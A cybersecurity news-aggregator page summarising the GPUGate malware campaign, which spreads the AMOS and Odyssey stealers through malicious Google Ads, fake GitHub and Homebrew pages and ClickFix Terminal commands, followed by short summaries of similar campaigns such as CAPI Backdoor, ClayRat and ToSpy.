CyberHappenings logo
Home Browse About

Track cybersecurity events as they unfold. Sourced timelines. Filter, sort, and browse. Fast, privacy‑respecting. No invasive ads, no tracking.

GPUGate Malware Campaign Targets IT Firms in Western Europe

First reported
Last updated
3 unique sources, 5 articles

Summary

Hide ▲

A sophisticated malware campaign, codenamed GPUGate, targets IT and software development companies in Western Europe, with recent expansions to macOS users. The campaign leverages Google Ads, SEO poisoning, and fake GitHub commits to deliver malware, including the Atomic macOS Stealer (AMOS) and Odyssey. The attack began in December 2024 and uses a 128 MB Microsoft Software Installer (MSI) to evade detection. The malware employs GPU-gated decryption and various techniques to avoid analysis and detection. The end goal is information theft and delivery of secondary payloads. The threat actors have native Russian language proficiency and use a cross-platform approach. The campaign has expanded to target macOS users through fake Homebrew, LogMeIn, and TradingView platforms. These platforms impersonate popular tools and use SEO poisoning to distribute the Atomic Stealer malware and Odyssey. The threat actors use multiple GitHub usernames to evade takedowns and deploy malware via Terminal commands. Similar tactics have been observed in previous campaigns using malicious Google Ads and public GitHub repositories. The AMOS malware now includes a backdoor component for persistent, stealthy access to compromised systems. The campaign impersonates over 100 software solutions, including 1Password, Dropbox, Confluence, Robinhood, Fidelity, Notion, Gemini, Audacity, Adobe After Effects, Thunderbird, and SentinelOne. The fake GitHub pages were created on September 16, 2025, and were immediately submitted for takedown. The campaign has been active since at least April 2023, with previous similar campaigns observed in July 2025.

Timeline

  1. 18.10.2025 18:02 1 articles · 23h ago

    New malware payloads AMOS and Odyssey target macOS developers

    The campaign targets macOS developers with fake Homebrew, LogMeIn, and TradingView platforms. The campaign employs 'ClickFix' techniques to trick targets into executing commands in Terminal. The campaign uses Google Ads to drive traffic to malicious sites and promote them in Google Search results. The malicious sites feature convincing download portals for fake apps and instruct users to copy a curl command in their Terminal to install them. The commands fetch and decode an 'install.sh' file, which downloads a payload binary, removing quarantine flags and bypassing Gatekeeper prompts. The payload is either AMOS or Odyssey, executed on the machine after checking if the environment is a virtual machine or an analysis system. The malware invokes sudo to run commands as root and collects detailed hardware and memory information of the host. The malware manipulates system services like killing OneDrive updater daemons and interacts with macOS XPC services to blend its malicious activity with legitimate processes. The malware harvests sensitive information stored on the browser, cryptocurrency credentials, and exfiltrates to the command and control (C2).

    Show sources
    Open in new tab
  2. 22.09.2025 22:44 1 articles · 26d ago

    Threat actors view Mac users as low-hanging fruit

    The threat actors may view Mac users as a low-hanging fruit due to the perception that Macs face fewer malware threats. The campaign has been active since at least April 2023, with previous similar campaigns observed in July 2025.

    Show sources
    Open in new tab
  3. 22.09.2025 18:36 1 articles · 26d ago

    AMOS malware adds backdoor for persistent access

    The Atomic (AMOS) malware now includes a backdoor component, giving attackers persistent, stealthy access to compromised systems. The AMOS malware is a malware-as-a-service operation available for $1,000/month.

    Show sources
    Open in new tab
  4. 20.09.2025 10:07 3 articles · 29d ago

    GPUGate campaign expands to macOS users through fake GitHub repositories

    The fake GitHub pages were created on September 16, 2025, and were immediately submitted for takedown. The campaign uses SEO poisoning to ensure the fake repositories are positioned well in search results. The campaign has been active since at least April 2023, with previous similar campaigns observed in July 2025. The campaign now targets macOS developers with fake Homebrew, LogMeIn, and TradingView platforms.

    Show sources
    Open in new tab
  5. 08.09.2025 18:02 5 articles · 1mo ago

    GPUGate Malware Campaign Targets IT Firms in Western Europe

    The campaign has targeted a range of companies across the technology and financial sectors, including LastPass. The fake GitHub pages were created on September 16, 2025, and were immediately submitted for takedown. The campaign uses SEO poisoning to ensure the fake repositories are positioned well in search results. The campaign has been active since at least April 2023, with previous similar campaigns observed in July 2025. The campaign now targets macOS developers with fake Homebrew, LogMeIn, and TradingView platforms.

    Show sources
    Open in new tab

Information Snippets

Similar Happenings

CAPI Backdoor Targets Russian Auto and E-Commerce Firms via .NET Malware

A new campaign targeting the Russian automobile and e-commerce sectors uses a previously undocumented .NET malware, CAPI Backdoor. The attack chain involves phishing emails with ZIP archives containing a decoy document and a malicious Windows shortcut file. The malware, disguised as 'adobe.dll', uses legitimate Microsoft binaries to execute and establish persistence. It can steal data from browsers, take screenshots, and exfiltrate information. The campaign includes a domain impersonating a legitimate Russian automotive site.

Open in new tab

GXC Team CaaS Platform Dismantled in Spain

Spanish authorities have dismantled the GXC Team, a crime-as-a-service (CaaS) operation. The group offered AI-powered phishing kits, Android malware, and voice-scam tools. The leader, a 25-year-old Brazilian known as “GoogleXcoder,” was arrested in San Vicente de la Barquera, Cantabria, after a year-long investigation involving six coordinated raids across Spain. The group targeted banks, transport, and e-commerce entities in multiple countries. The operation involved coordinated raids across seven Spanish regions, seizing electronic devices and cryptocurrency. The investigation is ongoing, with potential further arrests. The GXC Team's leader, known as GoogleXcoder, lived as a digital nomad, relocating between multiple homes in different Spanish provinces. The police identified six other individuals allegedly associated with the CaaS operation. The GXC Team's Telegram channels were deactivated, and digital evidence is being examined to identify other suspects. The CaaS operation emerged in 2023, offering advanced phishing kits, an SMS-stealing Android trojan, and tools for AI-supported voice scams.

Open in new tab

ClayRat Spyware Campaign Targets Android Users in Russia

A rapidly evolving Android spyware campaign known as ClayRat continues to target Russian users through Telegram channels and phishing websites. The spyware disguises itself as trusted apps such as WhatsApp, TikTok, Google Photos, and YouTube to trick users into downloading malicious software. Over the past three months, researchers identified more than 600 distinct ClayRat samples and 50 droppers, each version introducing new obfuscation layers to evade security tools. Once installed, the spyware can exfiltrate call logs, SMS messages, and notifications, take photos using the front camera, and send messages or place calls directly from the victim’s phone. The spyware’s operators employ a multifaceted strategy combining impersonation, deception, and automation. Distribution occurs mainly through phishing sites, Telegram channels, step-by-step installation guides, and session-based installers posing as Play Store updates. ClayRat’s most concerning feature is its abuse of Android's default SMS handler role, allowing it to read, store, and send text messages without alerting users. This access is exploited to spread itself further, sending messages to every saved contact. Zimperium's systems detected ClayRat variants as soon as they appeared, before public disclosures. The company shared its findings with Google, helping ensure protection through Google Play Protect. Security experts recommend a layered mobile security posture to reduce installation paths, detect compromise, and limit the blast radius. Users should only install applications from authorized Play/App stores.

Open in new tab

WordPress Sites Exploited for ClickFix Phishing Attacks

WordPress sites are being exploited to inject malicious JavaScript that redirects users to phishing pages. The attacks use a theme-related file to load a dynamic payload from a remote server, which includes a JavaScript file and a hidden iframe mimicking legitimate Cloudflare assets. The domain involved is part of a traffic distribution system (TDS) known as Kongtuke. The campaign highlights the need for securing WordPress sites and keeping software up-to-date. Additionally, a new phishing kit named IUAM ClickFix Generator allows attackers to create customizable phishing pages mimicking browser verification challenges. This kit has been used to deploy information stealers like DeerStealer and Odyssey Stealer. The emergence of such tools lowers the barrier to entry for cybercriminals, enabling sophisticated, multi-platform attacks. A new ClickFix campaign employs cache smuggling to evade detection, using the browser's cache to store malicious data without downloading files or communicating with the internet. The attack masquerades as a Fortinet VPN Compliance Checker, executing an obfuscated payload via a PowerShell script.

Open in new tab

ToSpy and ProSpy spyware targeting UAE users

Two spyware families, ToSpy and ProSpy, are targeting Android users in the UAE by masquerading as the ToTok app and Signal encryption plugins. These campaigns have been active since 2022 and 2024, respectively, and exploit the popularity and local trust of ToTok to infiltrate devices and exfiltrate sensitive data. ToTok, a messaging app developed by G42 and supported by the UAE government, was exposed as spyware in 2019 and removed from major app stores. Despite this, it continues to circulate outside official channels, providing cover for malicious actors. The spyware families request invasive permissions to steal device information, contacts, SMS messages, and various file types. Google Play Protect is designed to mitigate these threats, but users are still at risk if they download apps from untrusted sources. The spyware campaigns are distributed via fake websites and social engineering, establishing persistent access to compromised devices. The ProSpy campaign was discovered in June 2025 and has been ongoing since 2024, while the ToSpy campaign began on June 30, 2022, and is currently ongoing. The spyware families use deceptive websites masquerading as legitimate services to distribute malware. The spyware families exfiltrate device information, SMS messages, contact lists, files, and a list of installed applications. The spyware families use Android's AlarmManager to repeatedly restart the foreground service if it gets terminated. The spyware families automatically launch the necessary background services upon a device reboot.

Open in new tab